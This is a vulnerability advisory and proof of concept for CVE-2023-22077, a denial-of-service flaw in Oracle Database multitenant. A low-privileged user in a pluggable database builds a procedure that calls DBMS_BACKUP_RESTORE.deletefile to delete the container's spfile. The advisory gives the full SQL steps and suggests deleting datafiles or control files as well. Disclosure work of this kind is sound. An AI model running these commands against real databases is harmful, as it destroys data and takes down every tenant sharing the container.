Title: CVE-2023-22077 – Denial of Service from PDB Level against Container Level (DoS) – breaking PDB Isolation Product: Database Vendor: Oracle Affected Version(s): 19c,21c Tested Version(s): 19c,21c Fixed Versions: 19.21,21.12 Risk Level: Medium Solution Status: Fixed CVE Reference: CVE-2023-22077 Base Score: 4.9 Author of Advisory: Emad Al-Mousa ***************************************** Vulnerability Details: Isolation in Multitenant Cloud Architecture is a challenging topic in cybersecurity, for the last couple of years security researchers were able to break this isolation in multiple cloud vendors that lead to severe impact.so, its on going hot and challenging cybersecurity area. The following vulnerability PoC illustrates that even though "Lockdown Profile" security feature was in-place to restrict OS accessibility, an attacker will be able to cause a denial of service attack that can impact ALL customers co-hosted within the same container database instance. ***************************************** Proof of Concept (PoC): From CDB$ROOT Level I will create a lockdown profile to restrict any OS_ACCESS activity: SQL> create lockdown profile OS_ACC; SQL> select * from DBA_LOCKDOWN_PROFILES; SQL> ALTER LOCKDOWN PROFILE OS_ACC DISABLE FEATURE= ('OS_ACCESS'); I will enable the lockdown profile to pluggable database ORCLPDB1, as SYS user: SQL> alter session set container=ORCLPDB1; SQL> show parameter pdb_lockdown SQL> alter system set pdb_lockdown=OS_ACC; SQL> startup force; // side remark: to disable lockdown profile on PDB level SQL> alter system set pdb_lockdown=''; At pluggable database ORCLPDB1 I will create account called John with connect,create any procedure, execute any procedure, and create any directory to try performing DOS attack weaponizing UTL_FILE package: sqlplus / as sysdba SQL> alter session set container=ORCLPDB1; SQL> create user john identified by john_123; User created. SQL> grant connect,create any procedure,create any directory,execute any procedure to john; Grant succeeded. I will now connect to ORCLPDB1 using account john: sqlplus "john/john_123"@ORCLPDB1 SQL> show user USER is "JOHN" SQL> select SYS_CONTEXT ('USERENV','ORACLE_HOME') from dual; SYS_CONTEXT('USERENV','ORACLE_HOME') -------------------------------------------------------------------------------- /opt/oracle/product/19c/dbhome_1 SQL> create or replace directory RAMBO as '/opt/oracle/product/19c/dbhome_1/dbs/'; SQL> grant read,write on directory RAMBO to WMSYS; grant read,write on directory RAMBO to WMSYS * ERROR at line 1: ORA-01031: insufficient privileges ** At this stage I can't continue further as expected as lockdown profile restricted me from proceeding from doing any further exploitation weaponizing utl_file package Trying different approach/method with different account with different set of permissions, so I will create account "tom" in pluggable database ORCLPDB1: sqlplus / as sysdba SQL> alter session set container=ORCLPDB1; SQL> create user tom identified by tom_123; User created. SQL> grant connect,create any procedure,execute any procedure to tom; Grant succeeded. // connecting as tom against pluggable database ORCLPDB1 sqlplus "tom/tom_123"@ORCLPDB1 SQL> create or replace procedure sysbackup.dos is begin SYS.DBMS_BACKUP_RESTORE.deletefile('/opt/oracle/product/19c/dbhome_1/dbs/spfileORCLCDB.ora'); end; / Procedure created. SQL> exec sysbackup.dos; // Database will not startup as parameter file was deleted !! Of course more excessive damage can happen for example by deleting system data file belonging to the CDB$ROOT OR deleting database binaries, OR CONTROL FILES which means complete and extended outage for all applications co-hosted within the container ! ***************************************** References: https://databasesecurityninja.wordpress.com/2025/08/04/cve-2023-22077-denial-of-service-from-pdb-level-against-container-level-dos-breaking-pdb-isolation/ https://github.com/emad-almousa/CVE-2023-22077 https://www.oracle.com/security-alerts/cpuoct2023.html https://nvd.nist.gov/vuln/detail/cve-2023-22077